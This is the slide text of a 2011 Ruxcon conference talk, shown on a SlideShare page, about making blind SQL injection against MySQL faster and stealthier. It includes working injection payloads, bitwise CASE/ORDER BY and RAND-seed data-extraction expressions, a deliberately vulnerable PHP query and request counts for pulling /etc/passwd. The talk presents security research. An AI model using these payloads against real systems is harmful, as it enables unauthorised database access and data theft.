SlideShare ist ein Scribd-Unternehmen logo

Harder Faster Stronger

S
snyff

Talk done by Luke Jahnke and I in 2011 at Ruxcon on optimisation of SQL injections

Technologie
1 von 43
Downloaden Sie, um offline zu lesen
Louis <louis@securusglobal.com> Luke <luke@securusglobal.com>
SELECT user FROM mysql.user LIMIT 2 • Security consultants working for Securus Global in Melbourne • Have done/are doing a lot a web pentesting • Research focus on web security: – Web Attacks – Web Application Scanners (WAS) testing – Web Application Firewall (WAF) testing – (In)Secure coding
Why do we want to optimize SQL injections? • Stealth • Retrieving a large amount of data • Being faster • Because you’re bored using sqlmap • Because it’s fun
What can be optimized? • Length of the injection • Number of requests to retrieve information – Optimize retrieval strategy – Optimizations on information
Reducing injection length (MySQL) • SUBSTR() instead of SUBSTRING() • MID() instead of SUBSTR() • Using CRC32() – Instead of using the long string you replace it with the CRC32
Reducing injection length (MySQL) • SELECT@@version instead of SELECT VERSION() • &&1 instead of AND 1=1 • &1 instead of &&1 • ||1 instead of OR 1=1 • |1 instead of ||1 (fails for NULL|1)
Reducing injection length (MySQL) • !id instead of id=0 • > instead of <= (don’t forget to swap the
String Retrieval • LENGTH('admin') = 5 – 5 * 7 bits = 35 requests • LENGTH(COMPRESS('admin')) = 17 – 17 * 7 bits = 119 requests
Original vs Compressed • Based on CVE allitems.txt – about 47,000 VARCHAR(1000) SELECT ROUND(AVG( LENGTH(COMPRESS(SUBSTRING( text,1,N ))) )) FROM texts
How to get 80 characters? SELECT COMPRESS(CONCAT_WS(':', id,name,age,address,password )) FROM users SELECT GROUP_CONCAT(user,password) FROM users; • 1024 Character limit
Hash Retrieval • LENGTH(MD5('X')) = 32 – 32 * 7 bits = 224 requests • LENGTH(COMPRESS(MD5('X')) = 44 – 44 * 7 bits = 308 requests
Hash Retrieval • Hash keyspace [0-9a-f] • LENGTH(UNHEX(MD5(‘X’))) = 16 – Need to retrieve all 8 bits – 16 x 8 bits = 128 requests
Integer Retrieval • “131” → 3 x 7bits • 131 → 8 bits • Dichotomy search • Use CONV()
Improving Detection • AND 1=0 --’ AND 1=0 --” AND 1=0 -- • AND 1=0 --’ AND 1=0 --” AND 1=0 -- • AND 1=0 --’ AND 1=0 --” AND 1=0 -- • Really good payload to detect SQL injection in one request
Data prediction
Using Markov • Given the current characters what is the next character most likely going to be • Learning from a list of table names, column names and data to get a model of the data • For each request check if the character is the one predicted before trying to retrieve his 7 bits
Tree • Based on the information already retrieved guess the next characters • For example if I already retrieved RUX, the next character is likely to be C … for RUXCON • And if you don’t have anything in your tree matching, you can use markov
Tree learning process
Tree learning process
Guessing process • You already have “RU”
Statistics • No optimisation: 3345 • Markov: 3102 • Markov + Lowercase: 3006 • Markov + Lowercase + Tree: 1166 • Updating the tree when retrieving information can be used as well, but not always effective
Maximising information retrieved for each request
Vulnerability … $o = $_GET['order']; $sql = 'SELECT * FROM users'; $sql .= 'ORDER BY '; $sql .= mysql_real_escape_string($o); $result = mysql_sql($sql); …
Exploitation • Slow brute force: – Blindly check each character against the alphabet • A bit better: IF (ASCII(substring((select @@version),1,1))&1, id, name) IF (ASCII(substring((select @@version),1,1))&2, id, name) IF (ASCII(substring((select @@version),1,1))&4, id, name) IF (ASCII(substring((select @@version),1,1))&8, id, name) IF (ASCII(substring((select @@version),1,1))&16, id, name) IF (ASCII(substring((select @@version),1,1))&32, id, name) IF (ASCII(substring((select @@version),1,1))&64, id, name) IF (ASCII(substring((select @@version),2,1))&1, id, name)
Exploitation • Blind SQLi: 2 states • We can do better... – Let say we have 4 columns: => 4 states – order by can sort by multiple columns: “order by firstname, lastname” => more states (8 if lucky) – Color Blind SQLi (copyright Nicolas Collignon)
Exploitation • For each combinations of order by: – fingerprint the response (with cast for id) – md5 for global warming • SQL has a case statement: CASE (ASCII(substring((select @@version),1,1))&4) WHEN 0 then column1 WHEN 1 then column2 WHEN 2 then column3 WHEN 3 then column4 END
Exploitation ## Retrieving ----XXXX CASE (ASCII(substring((select @@version),1,1))&3) when 0 then id when 1 then name when 2 then age when 3 then groupid END ASC, CASE ((ASCII(substring((select @@version),1,1))&12)>>2) when 0 then id when 1 then name when 2 then age when 3 then groupid END ASC ## Retrieving XXXX---- CASE ((ASCII(substring((select @@version),1,1))&48)>>4) when 0 then id when 1 then name when 2 then age when 3 then groupid END ASC, CASE ((ASCII(substring((select @@version),1,1))&192)>>6) when 0 then id when 1 then name when 2 then age when 3 then groupid END ASC © Securus Global 2010
Exploitation SELECT id,username FROM users id username 1 admin 2 moderator 3 guest
Exploitation SELECT id,username FROM users ORDER BY RAND() id username 2 moderator 1 admin 3 guest
Exploitation SELECT id,username FROM users ORDER BY RAND() id username 3 guest 2 moderator 1 admin
Exploitation SELECT id,username FROM users ORDER BY RAND(1) id username 3 guest 1 admin 2 moderator
Exploitation SELECT id,username FROM users ORDER BY RAND(1) id username 3 guest 1 admin 2 moderator
Exploitation RAND seed Order of id 0 1,2,3 1 3,1,2 2 2,3,1 3 3,2,1 4 1,2,3
Exploitation RAND seed Order of id Bits 0 1,2,3 00 1 3,1,2 01 2 2,3,1 10 3 3,2,1 11
Exploitation RAND( CONV( CONCAT( IF((true/false),0,1), IF((true/false),0,1) ) ,2,10 ) )
Exploitation
Statistics Rows Bits 2-6 1 7 5 8 5 9 9 10 11 11 12 12 13 13 17
Real World Scenario • 7 rows • Can retrieve 5 bits per request • 1830 characters (14640 bits) in /etc/passwd • Retrieve with 2930 requests • 740 characters for compressed /etc/passwd • Retrieved with 1186 requests
Source available tomorrow at: https://github.com/lukejahnke
Questions?

Empfohlen

Defcon CTF quals
Defcon CTF qualsDefcon CTF quals
Defcon CTF qualssnyff
 
ORMs in Golang
ORMs in GolangORMs in Golang
ORMs in GolangIkenna Okpala
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS VectorsRodolfo Assis (Brute)
 
Appsec usa2013 js_libinsecurity_stefanodipaola
Appsec usa2013 js_libinsecurity_stefanodipaolaAppsec usa2013 js_libinsecurity_stefanodipaola
Appsec usa2013 js_libinsecurity_stefanodipaoladrewz lin
 
Think Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack VectorsThink Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack VectorsMark Ginnebaugh
 
Introduction to node.js
Introduction to node.jsIntroduction to node.js
Introduction to node.jsjacekbecela
 
Building Fast, Modern Web Applications with Node.js and CoffeeScript
Building Fast, Modern Web Applications with Node.js and CoffeeScriptBuilding Fast, Modern Web Applications with Node.js and CoffeeScript
Building Fast, Modern Web Applications with Node.js and CoffeeScriptroyaldark
 
introduction to node.js
introduction to node.jsintroduction to node.js
introduction to node.jsorkaplan
 

Empfohlen

Defcon CTF quals
Defcon CTF qualsDefcon CTF quals
Defcon CTF qualssnyff
 
ORMs in Golang
ORMs in GolangORMs in Golang
ORMs in GolangIkenna Okpala
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS VectorsRodolfo Assis (Brute)
 
Appsec usa2013 js_libinsecurity_stefanodipaola
Appsec usa2013 js_libinsecurity_stefanodipaolaAppsec usa2013 js_libinsecurity_stefanodipaola
Appsec usa2013 js_libinsecurity_stefanodipaoladrewz lin
 
Think Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack VectorsThink Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack VectorsMark Ginnebaugh
 
Introduction to node.js
Introduction to node.jsIntroduction to node.js
Introduction to node.jsjacekbecela
 
Building Fast, Modern Web Applications with Node.js and CoffeeScript
Building Fast, Modern Web Applications with Node.js and CoffeeScriptBuilding Fast, Modern Web Applications with Node.js and CoffeeScript
Building Fast, Modern Web Applications with Node.js and CoffeeScriptroyaldark
 
introduction to node.js
introduction to node.jsintroduction to node.js
introduction to node.jsorkaplan
 
Intsllation & 1st program nodejs
Intsllation & 1st program nodejsIntsllation & 1st program nodejs
Intsllation & 1st program nodejsmonikadeshmane
 
A million connections and beyond - Node.js at scale
A million connections and beyond - Node.js at scaleA million connections and beyond - Node.js at scale
A million connections and beyond - Node.js at scaleTom Croucher
 
Building servers with Node.js
Building servers with Node.jsBuilding servers with Node.js
Building servers with Node.jsConFoo
 
Node js presentation
Node js presentationNode js presentation
Node js presentationmartincabrera
 
Sql injection 幼幼班
Sql injection 幼幼班Sql injection 幼幼班
Sql injection 幼幼班hugo lu
 
Design patterns - Common Solutions to Common Problems - Brad Wood
Design patterns - Common Solutions to Common Problems - Brad WoodDesign patterns - Common Solutions to Common Problems - Brad Wood
Design patterns - Common Solutions to Common Problems - Brad WoodOrtus Solutions, Corp
 
Node.js - A Quick Tour
Node.js - A Quick TourNode.js - A Quick Tour
Node.js - A Quick TourFelix Geisendörfer
 
Comet with node.js and V8
Comet with node.js and V8Comet with node.js and V8
Comet with node.js and V8amix3k
 
Node.js - Best practices
Node.js - Best practicesNode.js - Best practices
Node.js - Best practicesFelix Geisendörfer
 
Exploring Clojurescript
Exploring ClojurescriptExploring Clojurescript
Exploring ClojurescriptLuke Donnet
 
Node.js 0.8 features
Node.js 0.8 featuresNode.js 0.8 features
Node.js 0.8 featuresNicholas McClay
 
Zen of Akka
Zen of AkkaZen of Akka
Zen of AkkaKonrad Malawski
 
Codetainer: a Docker-based browser code 'sandbox'
Codetainer: a Docker-based browser code 'sandbox'Codetainer: a Docker-based browser code 'sandbox'
Codetainer: a Docker-based browser code 'sandbox'Jen Andre
 
hacking with node.JS
hacking with node.JShacking with node.JS
hacking with node.JSHarsha Vashisht
 
NodeJS for Beginner
NodeJS for BeginnerNodeJS for Beginner
NodeJS for BeginnerApaichon Punopas
 
Spock: Test Well and Prosper
Spock: Test Well and ProsperSpock: Test Well and Prosper
Spock: Test Well and ProsperKen Kousen
 
Survive JavaScript - Strategies and Tricks
Survive JavaScript - Strategies and TricksSurvive JavaScript - Strategies and Tricks
Survive JavaScript - Strategies and TricksJuho Vepsäläinen
 
We Are All Testers Now: The Testing Pyramid and Front-End Development
We Are All Testers Now: The Testing Pyramid and Front-End DevelopmentWe Are All Testers Now: The Testing Pyramid and Front-End Development
We Are All Testers Now: The Testing Pyramid and Front-End DevelopmentAll Things Open
 
Threat stack aws
Threat stack awsThreat stack aws
Threat stack awsJen Andre
 
The old is new, again. CVE-2011-2461 is back!
The old is new, again. CVE-2011-2461 is back!The old is new, again. CVE-2011-2461 is back!
The old is new, again. CVE-2011-2461 is back!Luca Carettoni
 
MongoDB for Time Series Data Part 3: Sharding
MongoDB for Time Series Data Part 3: ShardingMongoDB for Time Series Data Part 3: Sharding
MongoDB for Time Series Data Part 3: ShardingMongoDB
 
NOSQL and Cassandra
NOSQL and CassandraNOSQL and Cassandra
NOSQL and Cassandrarantav
 

Weitere ähnliche Inhalte

Was ist angesagt?

Intsllation & 1st program nodejs
Intsllation & 1st program nodejsIntsllation & 1st program nodejs
Intsllation & 1st program nodejsmonikadeshmane
 
A million connections and beyond - Node.js at scale
A million connections and beyond - Node.js at scaleA million connections and beyond - Node.js at scale
A million connections and beyond - Node.js at scaleTom Croucher
 
Building servers with Node.js
Building servers with Node.jsBuilding servers with Node.js
Building servers with Node.jsConFoo
 
Node js presentation
Node js presentationNode js presentation
Node js presentationmartincabrera
 
Sql injection 幼幼班
Sql injection 幼幼班Sql injection 幼幼班
Sql injection 幼幼班hugo lu
 
Design patterns - Common Solutions to Common Problems - Brad Wood
Design patterns - Common Solutions to Common Problems - Brad WoodDesign patterns - Common Solutions to Common Problems - Brad Wood
Design patterns - Common Solutions to Common Problems - Brad WoodOrtus Solutions, Corp
 
Comet with node.js and V8
Comet with node.js and V8Comet with node.js and V8
Comet with node.js and V8amix3k
 
Exploring Clojurescript
Exploring ClojurescriptExploring Clojurescript
Exploring ClojurescriptLuke Donnet
 
Codetainer: a Docker-based browser code 'sandbox'
Codetainer: a Docker-based browser code 'sandbox'Codetainer: a Docker-based browser code 'sandbox'
Codetainer: a Docker-based browser code 'sandbox'Jen Andre
 
Spock: Test Well and Prosper
Spock: Test Well and ProsperSpock: Test Well and Prosper
Spock: Test Well and ProsperKen Kousen
 
Survive JavaScript - Strategies and Tricks
Survive JavaScript - Strategies and TricksSurvive JavaScript - Strategies and Tricks
Survive JavaScript - Strategies and TricksJuho Vepsäläinen
 
We Are All Testers Now: The Testing Pyramid and Front-End Development
We Are All Testers Now: The Testing Pyramid and Front-End DevelopmentWe Are All Testers Now: The Testing Pyramid and Front-End Development
We Are All Testers Now: The Testing Pyramid and Front-End DevelopmentAll Things Open
 
Threat stack aws
Threat stack awsThreat stack aws
Threat stack awsJen Andre
 
The old is new, again. CVE-2011-2461 is back!
The old is new, again. CVE-2011-2461 is back!The old is new, again. CVE-2011-2461 is back!
The old is new, again. CVE-2011-2461 is back!Luca Carettoni
 

Was ist angesagt? (20)

Intsllation & 1st program nodejs
Intsllation & 1st program nodejsIntsllation & 1st program nodejs
Intsllation & 1st program nodejs
 
A million connections and beyond - Node.js at scale
A million connections and beyond - Node.js at scaleA million connections and beyond - Node.js at scale
A million connections and beyond - Node.js at scale
 
Building servers with Node.js
Building servers with Node.jsBuilding servers with Node.js
Building servers with Node.js
 
Node js presentation
Node js presentationNode js presentation
Node js presentation
 
Sql injection 幼幼班
Sql injection 幼幼班Sql injection 幼幼班
Sql injection 幼幼班
 
Design patterns - Common Solutions to Common Problems - Brad Wood
Design patterns - Common Solutions to Common Problems - Brad WoodDesign patterns - Common Solutions to Common Problems - Brad Wood
Design patterns - Common Solutions to Common Problems - Brad Wood
 
Node.js - A Quick Tour
Node.js - A Quick TourNode.js - A Quick Tour
Node.js - A Quick Tour
 
Comet with node.js and V8
Comet with node.js and V8Comet with node.js and V8
Comet with node.js and V8
 
Node.js - Best practices
Node.js - Best practicesNode.js - Best practices
Node.js - Best practices
 
Exploring Clojurescript
Exploring ClojurescriptExploring Clojurescript
Exploring Clojurescript
 
Node.js 0.8 features
Node.js 0.8 featuresNode.js 0.8 features
Node.js 0.8 features
 
Zen of Akka
Zen of AkkaZen of Akka
Zen of Akka
 
Codetainer: a Docker-based browser code 'sandbox'
Codetainer: a Docker-based browser code 'sandbox'Codetainer: a Docker-based browser code 'sandbox'
Codetainer: a Docker-based browser code 'sandbox'
 
hacking with node.JS
hacking with node.JShacking with node.JS
hacking with node.JS
 
NodeJS for Beginner
NodeJS for BeginnerNodeJS for Beginner
NodeJS for Beginner
 
Spock: Test Well and Prosper
Spock: Test Well and ProsperSpock: Test Well and Prosper
Spock: Test Well and Prosper
 
Survive JavaScript - Strategies and Tricks
Survive JavaScript - Strategies and TricksSurvive JavaScript - Strategies and Tricks
Survive JavaScript - Strategies and Tricks
 
We Are All Testers Now: The Testing Pyramid and Front-End Development
We Are All Testers Now: The Testing Pyramid and Front-End DevelopmentWe Are All Testers Now: The Testing Pyramid and Front-End Development
We Are All Testers Now: The Testing Pyramid and Front-End Development
 
Threat stack aws
Threat stack awsThreat stack aws
Threat stack aws
 
The old is new, again. CVE-2011-2461 is back!
The old is new, again. CVE-2011-2461 is back!The old is new, again. CVE-2011-2461 is back!
The old is new, again. CVE-2011-2461 is back!
 

Ähnlich wie Harder Faster Stronger

MongoDB for Time Series Data Part 3: Sharding
MongoDB for Time Series Data Part 3: ShardingMongoDB for Time Series Data Part 3: Sharding
MongoDB for Time Series Data Part 3: ShardingMongoDB
 
NOSQL and Cassandra
NOSQL and CassandraNOSQL and Cassandra
NOSQL and Cassandrarantav
 
Memcached-инъекции - они существуют и работают, Иван Новиков (ONsec)
Memcached-инъекции - они существуют и работают, Иван Новиков (ONsec)Memcached-инъекции - они существуют и работают, Иван Новиков (ONsec)
Memcached-инъекции - они существуют и работают, Иван Новиков (ONsec)Ontico
 
ZFConf 2011: Что такое Sphinx, зачем он вообще нужен и как его использовать с...
ZFConf 2011: Что такое Sphinx, зачем он вообще нужен и как его использовать с...ZFConf 2011: Что такое Sphinx, зачем он вообще нужен и как его использовать с...
ZFConf 2011: Что такое Sphinx, зачем он вообще нужен и как его использовать с...ZFConf Conference
 
Cassandra Community Webinar - Introduction To Apache Cassandra 1.2
Cassandra Community Webinar - Introduction To Apache Cassandra 1.2Cassandra Community Webinar - Introduction To Apache Cassandra 1.2
Cassandra Community Webinar - Introduction To Apache Cassandra 1.2aaronmorton
 
Cassandra Community Webinar | Introduction to Apache Cassandra 1.2
Cassandra Community Webinar | Introduction to Apache Cassandra 1.2Cassandra Community Webinar | Introduction to Apache Cassandra 1.2
Cassandra Community Webinar | Introduction to Apache Cassandra 1.2DataStax
 
Lie to Me: Bypassing Modern Web Application Firewalls
Lie to Me: Bypassing Modern Web Application FirewallsLie to Me: Bypassing Modern Web Application Firewalls
Lie to Me: Bypassing Modern Web Application FirewallsIvan Novikov
 
MongoDB: Optimising for Performance, Scale & Analytics
MongoDB: Optimising for Performance, Scale & AnalyticsMongoDB: Optimising for Performance, Scale & Analytics
MongoDB: Optimising for Performance, Scale & AnalyticsServer Density
 
Haskell for data science
Haskell for data scienceHaskell for data science
Haskell for data scienceJohn Cant
 
2014 05-07-fr - add dev series - session 6 - deploying your application-2
2014 05-07-fr - add dev series - session 6 - deploying your application-22014 05-07-fr - add dev series - session 6 - deploying your application-2
2014 05-07-fr - add dev series - session 6 - deploying your application-2MongoDB
 
Scaling MySQL Strategies for Developers
Scaling MySQL Strategies for DevelopersScaling MySQL Strategies for Developers
Scaling MySQL Strategies for DevelopersJonathan Levin
 
How did i steal your database CSCamp2011
How did i steal your database CSCamp2011How did i steal your database CSCamp2011
How did i steal your database CSCamp2011Mostafa Siraj
 
A Cassandra + Solr + Spark Love Triangle Using DataStax Enterprise
A Cassandra + Solr + Spark Love Triangle Using DataStax EnterpriseA Cassandra + Solr + Spark Love Triangle Using DataStax Enterprise
A Cassandra + Solr + Spark Love Triangle Using DataStax EnterprisePatrick McFadin
 
Apache Cassandra - Data modelling
Apache Cassandra - Data modellingApache Cassandra - Data modelling
Apache Cassandra - Data modellingAlex Thompson
 
SMS Spam Filter Design Using R: A Machine Learning Approach
SMS Spam Filter Design Using R: A Machine Learning ApproachSMS Spam Filter Design Using R: A Machine Learning Approach
SMS Spam Filter Design Using R: A Machine Learning ApproachReza Rahimi
 
SequoiaDB Distributed Relational Database
SequoiaDB Distributed Relational DatabaseSequoiaDB Distributed Relational Database
SequoiaDB Distributed Relational Databasewangzhonnew
 
MongoDB for Time Series Data: Sharding
MongoDB for Time Series Data: ShardingMongoDB for Time Series Data: Sharding
MongoDB for Time Series Data: ShardingMongoDB
 
Artem Storozhuk - Search over encrypted records: from academic dreams to prod...
Artem Storozhuk - Search over encrypted records: from academic dreams to prod...Artem Storozhuk - Search over encrypted records: from academic dreams to prod...
Artem Storozhuk - Search over encrypted records: from academic dreams to prod...NoNameCon
 
Analytics at Speed: Introduction to ClickHouse and Common Use Cases. By Mikha...
Analytics at Speed: Introduction to ClickHouse and Common Use Cases. By Mikha...Analytics at Speed: Introduction to ClickHouse and Common Use Cases. By Mikha...
Analytics at Speed: Introduction to ClickHouse and Common Use Cases. By Mikha...Altinity Ltd
 

Ähnlich wie Harder Faster Stronger (20)

MongoDB for Time Series Data Part 3: Sharding
MongoDB for Time Series Data Part 3: ShardingMongoDB for Time Series Data Part 3: Sharding
MongoDB for Time Series Data Part 3: Sharding
 
NOSQL and Cassandra
NOSQL and CassandraNOSQL and Cassandra
NOSQL and Cassandra
 
Memcached-инъекции - они существуют и работают, Иван Новиков (ONsec)
Memcached-инъекции - они существуют и работают, Иван Новиков (ONsec)Memcached-инъекции - они существуют и работают, Иван Новиков (ONsec)
Memcached-инъекции - они существуют и работают, Иван Новиков (ONsec)
 
Solr @ Etsy - Apache Lucene Eurocon
Solr @ Etsy - Apache Lucene EuroconSolr @ Etsy - Apache Lucene Eurocon
Solr @ Etsy - Apache Lucene Eurocon
 
ZFConf 2011: Что такое Sphinx, зачем он вообще нужен и как его использовать с...
ZFConf 2011: Что такое Sphinx, зачем он вообще нужен и как его использовать с...ZFConf 2011: Что такое Sphinx, зачем он вообще нужен и как его использовать с...
ZFConf 2011: Что такое Sphinx, зачем он вообще нужен и как его использовать с...
 
Cassandra Community Webinar - Introduction To Apache Cassandra 1.2
Cassandra Community Webinar - Introduction To Apache Cassandra 1.2Cassandra Community Webinar - Introduction To Apache Cassandra 1.2
Cassandra Community Webinar - Introduction To Apache Cassandra 1.2
 
Cassandra Community Webinar | Introduction to Apache Cassandra 1.2
Cassandra Community Webinar | Introduction to Apache Cassandra 1.2Cassandra Community Webinar | Introduction to Apache Cassandra 1.2
Cassandra Community Webinar | Introduction to Apache Cassandra 1.2
 
Lie to Me: Bypassing Modern Web Application Firewalls
Lie to Me: Bypassing Modern Web Application FirewallsLie to Me: Bypassing Modern Web Application Firewalls
Lie to Me: Bypassing Modern Web Application Firewalls
 
MongoDB: Optimising for Performance, Scale & Analytics
MongoDB: Optimising for Performance, Scale & AnalyticsMongoDB: Optimising for Performance, Scale & Analytics
MongoDB: Optimising for Performance, Scale & Analytics
 
Haskell for data science
Haskell for data scienceHaskell for data science
Haskell for data science
 
2014 05-07-fr - add dev series - session 6 - deploying your application-2
2014 05-07-fr - add dev series - session 6 - deploying your application-22014 05-07-fr - add dev series - session 6 - deploying your application-2
2014 05-07-fr - add dev series - session 6 - deploying your application-2
 
Scaling MySQL Strategies for Developers
Scaling MySQL Strategies for DevelopersScaling MySQL Strategies for Developers
Scaling MySQL Strategies for Developers
 
How did i steal your database CSCamp2011
How did i steal your database CSCamp2011How did i steal your database CSCamp2011
How did i steal your database CSCamp2011
 
A Cassandra + Solr + Spark Love Triangle Using DataStax Enterprise
A Cassandra + Solr + Spark Love Triangle Using DataStax EnterpriseA Cassandra + Solr + Spark Love Triangle Using DataStax Enterprise
A Cassandra + Solr + Spark Love Triangle Using DataStax Enterprise
 
Apache Cassandra - Data modelling
Apache Cassandra - Data modellingApache Cassandra - Data modelling
Apache Cassandra - Data modelling
 
SMS Spam Filter Design Using R: A Machine Learning Approach
SMS Spam Filter Design Using R: A Machine Learning ApproachSMS Spam Filter Design Using R: A Machine Learning Approach
SMS Spam Filter Design Using R: A Machine Learning Approach
 
SequoiaDB Distributed Relational Database
SequoiaDB Distributed Relational DatabaseSequoiaDB Distributed Relational Database
SequoiaDB Distributed Relational Database
 
MongoDB for Time Series Data: Sharding
MongoDB for Time Series Data: ShardingMongoDB for Time Series Data: Sharding
MongoDB for Time Series Data: Sharding
 
Artem Storozhuk - Search over encrypted records: from academic dreams to prod...
Artem Storozhuk - Search over encrypted records: from academic dreams to prod...Artem Storozhuk - Search over encrypted records: from academic dreams to prod...
Artem Storozhuk - Search over encrypted records: from academic dreams to prod...
 
Analytics at Speed: Introduction to ClickHouse and Common Use Cases. By Mikha...
Analytics at Speed: Introduction to ClickHouse and Common Use Cases. By Mikha...Analytics at Speed: Introduction to ClickHouse and Common Use Cases. By Mikha...
Analytics at Speed: Introduction to ClickHouse and Common Use Cases. By Mikha...
 

Mehr von snyff

JWT: jku x5u
JWT: jku x5uJWT: jku x5u
JWT: jku x5usnyff
 
Code that gets you pwn(s|'d)
Code that gets you pwn(s|'d)Code that gets you pwn(s|'d)
Code that gets you pwn(s|'d)snyff
 
Entomology 101
Entomology 101Entomology 101
Entomology 101snyff
 
Entrepreneurship for hackers
Entrepreneurship for hackersEntrepreneurship for hackers
Entrepreneurship for hackerssnyff
 
Jwt == insecurity?
Jwt == insecurity?Jwt == insecurity?
Jwt == insecurity?snyff
 
Finding Needles in Haystacks
Finding Needles in HaystacksFinding Needles in Haystacks
Finding Needles in Haystackssnyff
 
Ruxmon cve 2012-2661
Ruxmon cve 2012-2661Ruxmon cve 2012-2661
Ruxmon cve 2012-2661snyff
 
Ln monitoring repositories
Ln monitoring repositoriesLn monitoring repositories
Ln monitoring repositoriessnyff
 
Owasp tds
Owasp tdsOwasp tds
Owasp tdssnyff
 
Ruxmon feb 2013 what happened to rails
Ruxmon feb 2013 what happened to railsRuxmon feb 2013 what happened to rails
Ruxmon feb 2013 what happened to railssnyff
 

Mehr von snyff (10)

JWT: jku x5u
JWT: jku x5uJWT: jku x5u
JWT: jku x5u
 
Code that gets you pwn(s|'d)
Code that gets you pwn(s|'d)Code that gets you pwn(s|'d)
Code that gets you pwn(s|'d)
 
Entomology 101
Entomology 101Entomology 101
Entomology 101
 
Entrepreneurship for hackers
Entrepreneurship for hackersEntrepreneurship for hackers
Entrepreneurship for hackers
 
Jwt == insecurity?
Jwt == insecurity?Jwt == insecurity?
Jwt == insecurity?
 
Finding Needles in Haystacks
Finding Needles in HaystacksFinding Needles in Haystacks
Finding Needles in Haystacks
 
Ruxmon cve 2012-2661
Ruxmon cve 2012-2661Ruxmon cve 2012-2661
Ruxmon cve 2012-2661
 
Ln monitoring repositories
Ln monitoring repositoriesLn monitoring repositories
Ln monitoring repositories
 
Owasp tds
Owasp tdsOwasp tds
Owasp tds
 
Ruxmon feb 2013 what happened to rails
Ruxmon feb 2013 what happened to railsRuxmon feb 2013 what happened to rails
Ruxmon feb 2013 what happened to rails
 

Kürzlich hochgeladen

Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoffsammart93
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobeapidays
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MIND CTI
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...apidays
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel Araújo
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProduct Anonymous
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdflior mazor
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?Igalia
 
Manulife - Insurer Transformation Award 2024
Manulife - Insurer Transformation Award 2024Manulife - Insurer Transformation Award 2024
Manulife - Insurer Transformation Award 2024The Digital Insurer
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherRemote DBA Services
 
Apidays Singapore 2024 - Scalable LLM APIs for AI and Generative AI Applicati...
Apidays Singapore 2024 - Scalable LLM APIs for AI and Generative AI Applicati...Apidays Singapore 2024 - Scalable LLM APIs for AI and Generative AI Applicati...
Apidays Singapore 2024 - Scalable LLM APIs for AI and Generative AI Applicati...apidays
 
AXA XL - Insurer Innovation Award Americas 2024
AXA XL - Insurer Innovation Award Americas 2024AXA XL - Insurer Innovation Award Americas 2024
AXA XL - Insurer Innovation Award Americas 2024The Digital Insurer
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century educationjfdjdjcjdnsjd
 
Corporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptxCorporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptxRustici Software
 
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ..."I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...Zilliz
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Drew Madelung
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Jeffrey Haguewood
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingEdi Saputra
 

Kürzlich hochgeladen (20)

